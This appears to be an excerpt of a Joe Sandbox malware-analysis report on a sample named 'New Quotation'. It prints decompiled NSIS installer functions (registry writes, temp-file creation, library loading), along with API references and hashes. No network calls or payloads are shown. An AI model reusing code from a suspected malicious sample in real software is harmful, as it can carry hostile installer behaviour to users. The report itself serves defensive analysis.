                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3962662361-3916222277
                                                                                                                                                                                          • Opcode ID: a34c7b22dcba9b29af9d2aaf87d85c1ba2021fc9fa2e85c2b5973347b8d0e52d
                                                                                                                                                                                          • Instruction ID: 70337b713eb308adcfff0eeef8eaeca0efd5001a829b407c4c24f60cc59763ec
                                                                                                                                                                                          • Opcode Fuzzy Hash: a34c7b22dcba9b29af9d2aaf87d85c1ba2021fc9fa2e85c2b5973347b8d0e52d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E41C572A042029FDB119F31D9A4B963BFDBF04B64F1444A6FD46AE086DB748084F7A8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 1005 40248a-4024bb call 402da6 * 2 call 402e36 1012 4024c1-4024cb 1005->1012 1013 402c2a-402c39 1005->1013 1014 4024cd-4024da call 402da6 lstrlenW 1012->1014 1015 4024de-4024e1 1012->1015 1014->1015 1018 4024e3-4024f4 call 402d84 1015->1018 1019 4024f5-4024f8 1015->1019 1018->1019 1021 402509-40251d RegSetValueExW 1019->1021 1022 4024fa-402504 call 4032b4 1019->1022 1026 402522-402603 RegCloseKey 1021->1026 1027 40251f 1021->1027 1022->1021 1026->1013 1027->1026
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E0040248A(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}













                                                                                                                                                                                          0x0040248a
                                                                                                                                                                                          0x0040248a
                                                                                                                                                                                          0x0040248a
                                                                                                                                                                                          0x0040248d
                                                                                                                                                                                          0x00402494
                                                                                                                                                                                          0x0040249e
                                                                                                                                                                                          0x004024a1
                                                                                                                                                                                          0x004024aa
                                                                                                                                                                                          0x004024b1
                                                                                                                                                                                          0x004024b8
                                                                                                                                                                                          0x004024bb
                                                                                                                                                                                          0x004024c1
                                                                                                                                                                                          0x004024cb
                                                                                                                                                                                          0x004024cf
                                                                                                                                                                                          0x004024da
                                                                                                                                                                                          0x004024da
                                                                                                                                                                                          0x004024e1
                                                                                                                                                                                          0x004024eb
                                                                                                                                                                                          0x004024f1
                                                                                                                                                                                          0x004024f4
                                                                                                                                                                                          0x004024f4
                                                                                                                                                                                          0x004024f8
                                                                                                                                                                                          0x00402504
                                                                                                                                                                                          0x00402504
                                                                                                                                                                                          0x00402515
                                                                                                                                                                                          0x0040251d
                                                                                                                                                                                          0x0040251f
                                                                                                                                                                                          0x0040251f
                                                                                                                                                                                          0x00402522
                                                                                                                                                                                          0x004025fd
                                                                                                                                                                                          0x004025fd
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nse2C2.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse2C2.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nse2C2.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseValuelstrlen
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nse2C2.tmp
                                                                                                                                                                                          • API String ID: 2655323295-2300459255
                                                                                                                                                                                          • Opcode ID: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                                                                                                                                                          • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1abf43c66d66a2eab4c5912dddbc3fe95e81c2d10ca9088dde855beb5deaf18
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040605C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                                                                                          0x00406062
                                                                                                                                                                                          0x00406068
                                                                                                                                                                                          0x00406069
                                                                                                                                                                                          0x00406069
                                                                                                                                                                                          0x0040606e
                                                                                                                                                                                          0x0040606f
                                                                                                                                                                                          0x00406072
                                                                                                                                                                                          0x00406077
                                                                                                                                                                                          0x0040607a
                                                                                                                                                                                          0x00406084
                                                                                                                                                                                          0x00406091
                                                                                                                                                                                          0x00406095
                                                                                                                                                                                          0x0040609d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004060a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004060a3
                                                                                                                                                                                          0x004060a3
                                                                                                                                                                                          0x004060a3
                                                                                                                                                                                          0x004060a6
                                                                                                                                                                                          0x004060a9
                                                                                                                                                                                          0x004060a9
                                                                                                                                                                                          0x004060ac
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040607A
                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,3073,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                          • API String ID: 1716503409-944333549
                                                                                                                                                                                          • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                          • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                                                                                                                          • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405EB7(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E39(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AEB( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A6E( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653D(L"C:\\Users\\Arthur\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                                                                                                                          0x004015c1
                                                                                                                                                                                          0x004015c9
                                                                                                                                                                                          0x004015cc
                                                                                                                                                                                          0x004015d1
                                                                                                                                                                                          0x004015d5
                                                                                                                                                                                          0x004015d7
                                                                                                                                                                                          0x004015df
                                                                                                                                                                                          0x004015e1
                                                                                                                                                                                          0x004015e4
                                                                                                                                                                                          0x004015ea
                                                                                                                                                                                          0x00401604
                                                                                                                                                                                          0x00401607
                                                                                                                                                                                          0x004015ec
                                                                                                                                                                                          0x004015ec
                                                                                                                                                                                          0x004015ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004015fa
                                                                                                                                                                                          0x004015fd
                                                                                                                                                                                          0x004015fd
                                                                                                                                                                                          0x004015ef
                                                                                                                                                                                          0x0040160e
                                                                                                                                                                                          0x00401615
                                                                                                                                                                                          0x00401624
                                                                                                                                                                                          0x00401624
                                                                                                                                                                                          0x00401617
                                                                                                                                                                                          0x0040161a
                                                                                                                                                                                          0x00401622
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401622
                                                                                                                                                                                          0x00401615
                                                                                                                                                                                          0x00401627
                                                                                                                                                                                          0x0040162b
                                                                                                                                                                                          0x0040162c
                                                                                                                                                                                          0x004015d7
                                                                                                                                                                                          0x00401634
                                                                                                                                                                                          0x00401663
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x00401636
                                                                                                                                                                                          0x00401638
                                                                                                                                                                                          0x00401645
                                                                                                                                                                                          0x0040164d
                                                                                                                                                                                          0x00401655
                                                                                                                                                                                          0x0040165b
                                                                                                                                                                                          0x0040165b
                                                                                                                                                                                          0x00401655
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70, 46u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75363420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                                                                                                                            • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                            • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                          • API String ID: 1892508949-670666241
                                                                                                                                                                                          • Opcode ID: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                                                                                                                          • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                                                                                                                          • Opcode Fuzzy Hash: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004020D8 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 60%
                                                                                                                                                                                          			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                                                          0x004020d8
                                                                                                                                                                                          0x004020d8
                                                                                                                                                                                          0x004020dd
                                                                                                                                                                                          0x004020e4
                                                                                                                                                                                          0x004021a3
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x004022f1
                                                                                                                                                                                          0x00402c2a
                                                                                                                                                                                          0x00402c2d
                                                                                                                                                                                          0x00402c39
                                                                                                                                                                                          0x00402c39
                                                                                                                                                                                          0x004020f3
                                                                                                                                                                                          0x004020fd
                                                                                                                                                                                          0x00402100
                                                                                                                                                                                          0x00402110
                                                                                                                                                                                          0x00402114
                                                                                                                                                                                          0x0040211a
                                                                                                                                                                                          0x0040211c
                                                                                                                                                                                          0x0040211f
                                                                                                                                                                                          0x0040219c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040219c
                                                                                                                                                                                          0x00402121
                                                                                                                                                                                          0x0040212c
                                                                                                                                                                                          0x00402130
                                                                                                                                                                                          0x00402170
                                                                                                                                                                                          0x00402132
                                                                                                                                                                                          0x00402135
                                                                                                                                                                                          0x00402138
                                                                                                                                                                                          0x00402164
                                                                                                                                                                                          0x0040213a
                                                                                                                                                                                          0x0040213d
                                                                                                                                                                                          0x00402146
                                                                                                                                                                                          0x00402148
                                                                                                                                                                                          0x00402148
                                                                                                                                                                                          0x00402146
                                                                                                                                                                                          0x00402138
                                                                                                                                                                                          0x00402178
                                                                                                                                                                                          0x00402191
                                                                                                                                                                                          0x00402191
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402178
                                                                                                                                                                                          0x00402103
                                                                                                                                                                                          0x0040210b
                                                                                                                                                                                          0x0040210e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00000000,00425A20,753623A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                                                                                            • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                                                                                            • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse2C2.tmp\System.dll), ref: 0040560C
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                                                                                            • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.49391332260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.49391263589.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391435428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391508741.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391862881.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49391963803.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392051591.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392131322.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.49392170728.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 334405425-0
                                                                                                                                                                                          • Opcode ID: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                                                                                                                          • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                          			E00401B9B(void* __ebx) {
				intOrPtr _t8;
				void* _t9;
				void _t12;
				void* _t14;
				void* _t22;
				void* _t25;
				void* _t30;
				char* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t28 = __ebx;
				_t8 =  *((intOrPtr*)(_t37 - 0x28));
				_t33 =  *0x40ce50; // 0x0
				if(_t8 == __ebx) {
					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
						_t9 = GlobalAlloc(0x40, 0x804); // executed
						_t34 = _t9;
						_t5 = _t34 + 4; // 0x4
						E0040657A(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
						_t12 =  *0x40ce50; // 0x0
						 *_t34 = _t12;
						 *0x40ce50 = _t34;
					} else {
						if(_t33 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t3 = _t33 + 4; // 0x4
							E0040653D(_t30, _t3);
							_push(_t33);
							 *0x40ce50 =  *_t33;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t8 = _t8 - 1;
						if(_t33 == _t28) {
							break;
						}
						_t33 =  *_t33;
						if(_t8 != _t28) {
							continue;
						} else {
							if(_t33 == _t28) {
								break;
							} else {
								_t36 = _t33 + 4;
								_t32 = L"Call";
								E0040653D(_t32, _t33 + 4);
								_t22 =  *0x40ce50; // 0x0
								E0040653D(_t36, _t22 + 4);
								_t25 =  *0x40ce50; // 0x0
								_push(_t32);
								_push(_t25 + 4);
								E0040653D();
								L15:
								 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t37 - 4));
								_t14 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E0040657A(_t28, _t30, _t33, _t28, 0xffffffe8));
					E00405B9D();
					_t14 = 0x7fffffff;
				}
				L17:
				return _t14;
			}














                                                                                                                                                                                          0x00401b9b
                                                                                                                                                                                          0x00401b9b
                                                                                                                                                                                          0x00401b9e
                                                                                                                                                                                          0x00401ba6
                                                                                                                                                                                          0x00401bef
                                                                                                                                                                                          0x00401c1d
                                                                                                                                                                                          0x00401c26
                                                                                                                                                                                          0x00401c28
                                                                                                                                                                                          0x00401c2c
                                                                                                                                                                                          0x00401c31
                                                                                                                                                                                          0x00401c36
                                                                                                                                                                                          0x00401c38
                                                                                                                                                                                          0x00401bf1
                                                                                                                                                                                          0x00401bf3
                                                                                                                                                                                          0x0040292e
                                                                                                                                                                                          0x00401bf9
                                                                                                                                                                                          0x00401bf9
                                                                                                                                                                                          0x00401bfe
                                                                                                                                                                                          0x00401c05
                                                                                                                                                                                          0x00401c06
                                                                                                                                                                                          0x00401c0b
                                                                                                                                                                                          0x00401c0b
                                                                                                                                                                                          0x00401bf3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401ba8
                                                                                                                                                                                          0x00401ba8
                                                                                                                                                                                          0x00401ba8
                                                                                                                                                                                          0x00401bab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401bb1
                                                                                                                                                                                          0x00401bb5
